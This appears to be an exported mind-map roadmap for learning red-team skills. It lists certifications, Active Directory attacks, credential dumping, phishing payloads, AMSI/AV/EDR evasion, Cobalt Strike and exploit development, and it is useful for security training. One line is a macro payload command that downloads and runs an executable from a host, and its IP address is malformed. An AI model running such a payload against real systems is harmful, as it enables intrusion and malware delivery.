Red Team
Red Team
Red Team
Roadmap
Basics
Programming/Networking/OS
Programming
Malwares/Trojans 1
os (Operating System)
Windows
Domain Controller
Trees
Forest
Trusts
AD objects
Users
Printers
Computer
Groups
Servers
Accounts
local user accounts
Administrator account
Guest account
SYSTEM
Administrator
Guest
KRBTGT
Credential authenticators
NT hash
LM Hash
Credentials storage
SAM Database
Process Token
- primary token
- Impersonation
Command Prompt
Windows Internal
Windows Services
Processes
Registers
Windows Files
Memory management
STACK
HEAP
Memory pages
Virtual Memory
Linux
Networking
CCNA 200/301
Routing/Switching
VLAN/ Subnetting
DHCP SPoofing
Port Security
wireshark
Level 1
EJPT
Subdomain Enumeration
Sublist3r
DNSdumpster
Masscan
nmap
Vulnerability Assessment
Searchsploit
ExploitDB
Nessus
some vuln
SQL Injection
XSS
Practical Tools
Bash Scripting
Vulnerability Scanning
Client-Side Attacks
Fixing Exploits
File Transfers
Antivirus Evasion
Privilege Escalation
Password Attacks
PowerShell Empire
eCPPTv2
CTF
Tryhackme
hackthebox
Level 2
Gaining access to a client workstation or a server is only the first step in a typical
penetration test. Once we gain initial access, our goal is to compromise more of
the organization’s assets, either to obtain more privileged access, or gain access to
confidential information.
Privileges escalation
Checklists/Windows-Privilege-Escalati…
https://github.com/yeyintminthuhtut/Awesome-Red-Teaming#-privilege-
escalation
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodolo
gy%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#cve-2019-
14287
https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-
Escalation.md
persistence 5
GitHub - yeyintminthuhtut/Awesome-…
Level 3
CRTP/CRTPE (Pentest Academy Courses) & Active directory Attacks and lateral
movement (TCM Security courses)
Stolen credentials
Some command, options, modules need Privilege local Admin such as
Dumping Hashes, persistence, lateral movement, Example: add user to group
admin, need local admin privilege and some enumeration required admin local.
Also Enable and disable some production need admin local.
Mimikatz
Lateral Movement
Some command, options, modules need Privilege local Admin such as
Dumping Hashes, persistence, lateral movement, Example: add user to group
admin, need local admin privilege and some enumeration required admin local.
Also Enable and disable some production need admin local.
Some require clear text credentials and others work with a password
hash like crackmapexec
Token Impersonation
Attacks
Post-Compromise Enumeration
But before performing any attack using those credentials, it is possible and
necessary to perform advanced enumeration, based on the privileges of the
obtained vectors
Powerview
BloodHound
enum4linux
crackmapexec
Level 4
OSEP/PTX
https://github.com/In3x0rabl3/OSEP/blob/main/osep_checklistv2.md
https://exploit-me.com/blog/osep-cheat-sheet/
phishing assessment
HTML Smuggling
VBS
Jscript
Microsoft Office
VBA
DDE
macro_pack
Luckystrike
unicorn
python windows/download_exec
url=http://192.168.122:8080/test.exe macro
metasploit
DotNetToJScript
Email Security
Bypass Anti-spam
Defensive evasion
Bypass AMSI
Invoke-Obfuscation
Bypass AV
Level 5
Book 1: Red Team Development and Operation (SANS SEC564 Red Team
Operation)
.هذا الكتاب هو تتويج لسنوات من الخبرة في مجال تكنولوجيا المعلومات والأمن السيبراني
توجد مكونات هذا الكتاب كملاحظات تقريبية وأفكار وعمليات رسمية طورها المؤلفون
تم.واعتمدوها أثناء قيادتهم وتنفيذ ارتباطات الفريق الأحمر على مدار سنوات عديدة
استخدام المفاهيم الموضحة في هذا الكتاب للتخطيط الناجح وتقديم وتنفيذ مشاركات
تم توثيق بعض هذه المفاهيم ودمجها.الفريق الأحمر الاحترافية بجميع الأحجام والتعقيدات
.في عمليات إدارة الفريق الأحمر
ENGAGEMENT PLANNING
Thread planning
ENGAGEMENT EXECUTION
Execution's concept
ENGAGEMENT CULMINATION
ENGAGEMENT REPORTING
Book 2:
Hands_On_Red_Team_Tactics_A_practical_guide_to_mastering_Red_Team. (Red
team practices with Command and control server)
Level 6
Process Unhooking
API hooking
Level 7
Cobalt Strike Course: Raphael Mudge Cobalt strike red team course
Red Team Ops with Cobalt Strike (1 of …
Level 8
Initial Compromise
Host reconnaissance
Host persistence
Defensive Evasion
EDR Evasion
C2 infrastructure
Process Injection
Level 9
Exploit Development
Exploits shellcode handbook Book and gray hat book and the hacking art of
exploit book, and OSED course. for finding and writing your own exploits (3
Books and OSED Course)
Level 10
read Sparc Flow books "How to hack like a legend & how to hack like a
pornstar"